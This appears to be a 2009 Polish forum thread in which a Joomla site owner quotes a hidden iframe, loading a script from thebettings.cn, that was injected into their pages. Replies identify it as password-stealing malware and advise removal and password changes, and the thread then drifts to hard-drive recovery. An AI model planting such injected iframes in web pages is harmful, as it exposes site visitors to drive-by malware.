PDA

Zobacz pełną wersję : Dziwny wpis w kodzie



deejay.m
10-06-2009, 20:25
Dziwny wpis w kodzie Joomla

dzisiaj zauważyłem że w kodzie Joomla pojawił mi się dodatkowy wpis: linijka dodana w dwóch miejsach, po head i w body:

w iframe się ładuje takie coś:


iframe src="http://thebettings.cn:8080/ts/in.cgi?pepsi55" width=125 height=125 style="visibility: hidden"</pre>

wie ktoś z Was co to i czy to groźne ?? i jak to usunąć...prosze o pilną odpowiedź

Jola
10-06-2009, 21:03
Od dawna się trąbi na forum o wpisach iframe w plikach index.php i index.html
Jest dokładnie opisane co należy zrobić. Poszukaj

papugam
10-06-2009, 22:38
No to kolego masz problem. Generalnie wirus lub trojan jak zwał tak zwał. Zczytuje hasło z tc i potem robi kuku na serwerze własnie z iframe.. Usuń i zmień wszystkie hasła.
Powodzenia
Michał
Edit: była burza zjarało mi dysk 40 gb zdjęć poszło się .... 5 lat pracy a wlasnie zrobiłem segregacje i miałem w weekend nagrywać płyty :D nie zdąrzyłem

magdaa
10-06-2009, 22:52
mała dygresja w wątku, sorry ...

są firmy, które ponoć są w stanie odzyskać dane z najbardziej, jak to możliwe, uszkodzonych dysków ...

trzepiz
11-06-2009, 09:24
@papugam,

po takiej awarii uszkodzeniu ulega zwykle elektronika - talerze z danymi są nadal wartościowe .... (szczerze - to wystarczyłoby podmienić elektronikę w dysku i już) - ewentualnie możesz ją dać jakiemuś elektronikowi do sprawdzenia ..

Rybik
11-06-2009, 23:29
zapłać profesjonalniej firmie odzyskującej dane

papugam
12-06-2009, 17:45
Dzięki za podpowiedz pewnie tak będę musiał zrobić. Najpierw poszukam elektroniki i sobie zamienię potem firma, która mi to na pewno zrobi. A tak już w ogóle przy okazji nie ma ktoś do sprzedania elektroniki do WD1600 ze sprawną elektroniką. Proszę o kontakt papugam@o2.pl
Pozdrawiam
Michał